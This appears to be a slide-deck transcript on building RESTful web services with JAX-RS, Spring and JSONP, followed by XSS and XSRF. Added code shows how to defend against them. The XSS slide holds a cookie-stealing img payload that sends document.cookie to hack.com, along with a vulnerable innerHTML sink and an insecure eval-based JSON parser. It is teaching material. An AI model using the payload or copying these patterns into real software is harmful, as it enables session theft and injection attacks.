Restful Web Services By Loukik Purohit & Rohit Ghatol
Restful Web Service [Diagram: Browser, Desktop, Mobile; Messages (xml/json); CricInfo]
Restful Using Browser: User Intervention [Diagram: Vacation Subsystem; Cab Booking, Plane Booking, Hotel Booking]
Restful Automated: Machines interacting with each other [Diagram: Vacation Subsystem; Cab Booking, Plane Booking, Hotel Booking; SMS/Email]
Restful REST in layman's terms [Diagram: HR, Accounts, Admin]
Restful Organized structure. To get address of user 1, go to: OrganisationUsers1address
Restful Same analogy applies to Web
• Request to get all users: http://xyz.com/users
• Request to get user 1: http://xyz.com/users/1
• Request to get address of user 1: http://xyz.com/users/1/address
Restful Request-Response
GET Request
    GET /users/1 HTTP/1.1
    Host: xyz.com
    Accept: application/xml
GET Response
    <users>
      <id>1</id>
      <name>Loukik</name>
      <address>Pune</address>
      <skill>java</skill>
      <id>2</id>
      <name>...</name>
      <address>…</address>
      <skill>…</skill>
    </users>
Restful Request-Response
POST Request
    POST /users HTTP/1.1
    Host: xyz.com
    Content-Type: application/xml
    Accept: application/xml

    <users>
      <name>Rohit</name>
      <address>Pune</address>
      <skill>C++</skill>
    </users>
POST Response
    <result>
      <id>3</id>
    </result>
Restful HTTP
http://xyz.com/services/users
HTTP Headers
    Method: PUT
    Accept: application/xml
    Content-Type: application/xml
HTTP Body
    <users>
      <name>Rohit</name>
      <address>Pune</address>
      <skill>C++</skill>
    </users>
Restful Four verbs for every noun: GET, PUT, POST, DELETE
• http://example.com/customer/123
Restful JSON Can data be represented in the form of a List and a Map? Here's JSON
    var myObject = eval('(' + myJSONtext + ')');
Restful JSON Parser
Restful How JSON looks like
    var result = {
      "users": [
        { "id": "1", "name": "loukik", "address": "Pune", "skill": "java" },
        { "id": "2", "name": "rohit", "address": "Pune", "skill": "C++" }
      ]
    };
Accessing JSON in JavaScript code
    result.users[0].name   // "loukik"
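The eval call on the JSON slide treats the received text as a program, not as data. The following is an added example (not from the original slides) that puts that approach beside JSON.parse; the function names and both input strings are constructed for illustration.

```javascript
// Constructed inputs: one valid JSON document, one string that is
// JavaScript but not JSON (it only sets a harmless marker variable).
const goodText =
  '{"users":[{"id":"1","name":"loukik","address":"Pune","skill":"java"}]}';
const codeText =
  '(function(){ globalThis.sideEffect = "code ran"; return {users: []}; })()';

// The slide's approach: whatever the sender put in the text is executed.
function parseWithEval(text) {
  return eval('(' + text + ')');
}

// JSON.parse accepts only the JSON grammar and never runs the text.
function parseStrict(text) {
  try {
    return { ok: true, value: JSON.parse(text) };
  } catch (err) {
    return { ok: false, error: err.name };
  }
}

// Parsing is not validation: check the shape before using the data.
function firstUserName(text) {
  const parsed = parseStrict(text);
  if (!parsed.ok) return null;
  const users = parsed.value && parsed.value.users;
  if (!Array.isArray(users) || users.length === 0) return null;
  return typeof users[0].name === "string" ? users[0].name : null;
}
```
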
Restful REST
Restful Programmable Web Your Source to 3000+ Web Service APIs
Restful programmableweb.com
Restful Implement Restful Webservice
• Write a Servlet
• Implement doGet, doPost, doDelete
• Write business logic
• Create your Messages, that too JSON
Restful JAX-RS to the rescue. Marrying to API: Servlet, EJB. Being POJO (Single) is Great!: JAX-RS
Restful JAX-RS JSR 311: JAX-RS. More info at http://java.sun.com/javaee/6/docs/tutorial/doc/giepu.html
Restful JAX-RS Flow [Diagram: HTTP Request (JSON) -> JAX-RS Servlet -> POJO Model (JAXB @XmlRootElement) -> Business Logic -> POJO Model -> HTTP Response (JSON)]
Restful Spring REST • Based on Spring MVC
Restful Spring REST
• Negotiated view-based rendering
• HTTP message converters
Restful Enunciate Your Web service API + Full HTML documentation + Client-side libraries
Restful What does Enunciate do for me? [Diagram: JavaDoc, C, JAX-RS, ObjC, Client, Comm, SOAP, .Net, POJO, GWT, AMF, Java, Json]
Restful Enunciate • Enunciate is an engine for dramatically enhancing your Java Web service API. • Enunciate is primarily a build-time tool. • Develop your Web service API. • Attach Enunciate to your build process.
Restful Cross Site Scripting. Single Origin Policy [Diagram: http://geochirp.com makes Ajax Calls to maps.google.com and twitter.com]
Restful Single Origin Policy: Restrictions Imposed by Browser
• Ajax
• Accessing iFrame's DOM
[Diagram: http://www.abc.com (ABC.com JavaScript); http://xyz.com (Iframe, XYZ.com)]
Restful So How to do Mashups? Use Proxy: http://geochirp.com/proxy [Diagram: http://geochirp.com -> PROXY -> maps.google.com, twitter.com]
Restful So How to do Mashups? Use JSONP [Diagram: http://geochirp.com -> JSONP Call -> maps.google.com; JSONP Call -> twitter.com]
Restful What is JSONP? Static Script: http://xyz.com/script.js [Diagram: ABC.com, XYZ.com, XYZ.com JS]
• AJAX Call Not Allowed By Browser
• Including Scripts hosted on other domains is allowed
Restful What is JSONP? Dynamic Script: http://xyz.com/services/users/1?callback=myfun [Diagram: ABC.com, XYZ.com, XYZ.com JS]
• AJAX Call Not Allowed By Browser
• Including Scripts hosted on other domains is allowed
Restful JSONP Explained
http://xyz.com/services/users/1?callback=myfunc
JSON (Single Origin Policy)
    { "id": "1", "name": "loukik", "address": "Pune", "skill": "java" }
JSONP (No Such Restriction)
    myfunc({ "id": "1", "name": "loukik", "address": "Pune", "skill": "java" });
Restful JSONP Code Example
<html>
  <head>
    <script>
      // Callback named in the jsonp= parameter below; the server wraps its JSON in a call to it.
      // table.update stands for the page's own row-rendering code (not defined on the slide).
      function myfunc(data) {
        table.update(data);
      }
    </script>
  </head>
  <body>
    <table>
      <!-- employee table -->
      <tr><td>Name</td><td>Address</td><td>Role</td></tr>
      <tr><td>Rohit</td><td>Pune</td><td>Architect</td></tr>
      <tr><td>Loukik</td><td>Pune</td><td>Geek</td></tr>
    </table>
    <button id="add-employee">Add</button>
    <button id="next-100">Next 100</button>
    <!-- Cross-domain script include: the response is executed as JavaScript in this page -->
    <script src="http://xyz.com/services/fetchemployess?page=1&jsonp=myfunc"></script>
  </body>
</html>
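The server side of the JSONP exchange above reflects the callback parameter into a script that the including page executes, so the callback name has to be validated before it is echoed. The following is an added example, not code from the original slides; jsonpResponse, CALLBACK_RE and the response object shape are hypothetical names chosen for illustration.

```javascript
// Only a plain identifier is accepted as a callback name (assumed policy).
const CALLBACK_RE = /^[A-Za-z_$][0-9A-Za-z_$]{0,63}$/;

// Builds the response for /services/users/1?callback=<callbackParam>.
function jsonpResponse(callbackParam, data) {
  // Older JavaScript engines treat U+2028/U+2029 as line terminators
  // inside string literals, so they are escaped before embedding.
  const json = JSON.stringify(data)
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");

  // No callback requested: plain JSON, not executable by a <script> include.
  if (callbackParam === undefined) {
    return { status: 200, headers: { "Content-Type": "application/json" }, body: json };
  }
  // Anything other than an identifier would be reflected into executable
  // script on the including page, so it is rejected outright.
  if (typeof callbackParam !== "string" || !CALLBACK_RE.test(callbackParam)) {
    return { status: 400, headers: { "Content-Type": "text/plain" }, body: "invalid callback name" };
  }
  return {
    status: 200,
    headers: {
      "Content-Type": "application/javascript",
      "X-Content-Type-Options": "nosniff",
    },
    body: callbackParam + "(" + json + ");",
  };
}

// Constructed sample record, matching the user shown on the slides.
const sampleUser = { id: "1", name: "loukik", address: "Pune", skill: "java" };
const sampleReply = jsonpResponse("myfunc", sampleUser);
```

Any site can include a JSONP URL with a script tag and receive the data in its own callback, so such an endpoint should only return data that is safe to hand to every origin.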
Restful XSS [Diagram: Attacker, <script> attack script </script>, ScrapBook WebSite, User, Login, Hacked!!!]
Restful How to do XSS? Server needs an XSS Vulnerability. Say Dev uses div.innerHTML in code:
    function postScrap(){ div.innerHTML = textarea.value; }
What if I put an html with some JavaScript here? [Diagram: TextArea, Post, DIV]
Restful How to do XSS? Server needs an XSS Vulnerability. Say Dev uses div.innerHTML in code:
    function postScrap(){ div.innerHTML = textarea.value; }
    <h1>Look at this cool image</h1> <img src='http://hack.com/?cookie=" + encodeURI(document.cookie)'> </img>
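The postScrap() shown on the slides copies user text into innerHTML, so the browser parses it as markup. The following is an added example (not from the original slides) of the same step done safely, written so it also runs outside a browser; escapeHtml, scrapMarkupUnsafe, scrapMarkupSafe and countStartTags are hypothetical helper names and the scrap text is a constructed sample.

```javascript
const HTML_ESCAPES = {
  "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
};

// Encode the characters that let text break out into markup.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Same effect as the slide's innerHTML assignment: user text becomes markup.
function scrapMarkupUnsafe(text) {
  return '<div class="scrap">' + text + "</div>";
}

// Server-side rendering counterpart: user text stays text.
function scrapMarkupSafe(text) {
  return '<div class="scrap">' + escapeHtml(text) + "</div>";
}

// Rough count of element start tags a browser would create from markup.
function countStartTags(markup) {
  return (markup.match(/<[a-zA-Z][^>]*>/g) || []).length;
}

// In the browser the direct fix is textContent, which never parses HTML.
function postScrap(div, textarea) {
  div.textContent = textarea.value;
}

// Constructed sample scrap containing markup.
const sampleScrap = "<h1>Look at this cool image</h1><img src='x'>";
```
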
Restful XSRF • Cross Site Request Forgery. • Unauthorized commands are transmitted from a user that the website trusts. • Exploits the trust that a site has in a user's browser.
Restful XSRF [Diagram: User, Login, ScrapBook WebSite; Attacker, Send Mail with Script; User Opens Mail; Hacked!!!]
Restful How to do XSRF. Browser holds your sessions. What if I made you visit a page which uses your session to do hack? Is it Possible?
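Because the browser attaches the session to every request for the site, the server cannot rely on the cookie alone to know that a state-changing request came from its own pages. The following is an added example (not from the original slides) of a server-side source-origin check; allowRequest, sourceOrigin, the request object shape with lower-case header names, and the scrapbook.example and mail.example hosts are assumptions for illustration.

```javascript
// Methods that must never change state (GET in the REST verbs above).
const SAFE_METHODS = new Set(["GET", "HEAD", "OPTIONS"]);

// Origin of the page that issued the request: Origin header first,
// Referer as fallback. Returns null when neither is usable.
function sourceOrigin(headers) {
  const raw = headers["origin"] || headers["referer"];
  if (!raw || raw === "null") return null;
  try {
    return new URL(raw).origin;
  } catch {
    return null;
  }
}

// Decide whether a request may proceed, given the site's own origin.
function allowRequest(req, siteOrigin) {
  if (SAFE_METHODS.has(req.method.toUpperCase())) {
    return { allow: true, reason: "safe method" };
  }
  const source = sourceOrigin(req.headers);
  if (source === null) {
    return { allow: false, reason: "no usable Origin or Referer" };
  }
  if (source !== siteOrigin) {
    return { allow: false, reason: "cross-site source " + source };
  }
  return { allow: true, reason: "same origin" };
}

// Constructed requests: both carry the user's valid session cookie.
const SITE = "https://scrapbook.example";
const fromOwnPage = {
  method: "POST",
  headers: { origin: SITE, cookie: "session=constructed" },
};
const fromMailPage = {
  method: "POST",
  headers: { origin: "https://mail.example", cookie: "session=constructed" },
};
```

A per-session anti-forgery token checked on every state-changing request is the usual primary defence, with a check like this one as a second layer.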
Restful Aye Mate! How come I can use Google + and Facebook Like here?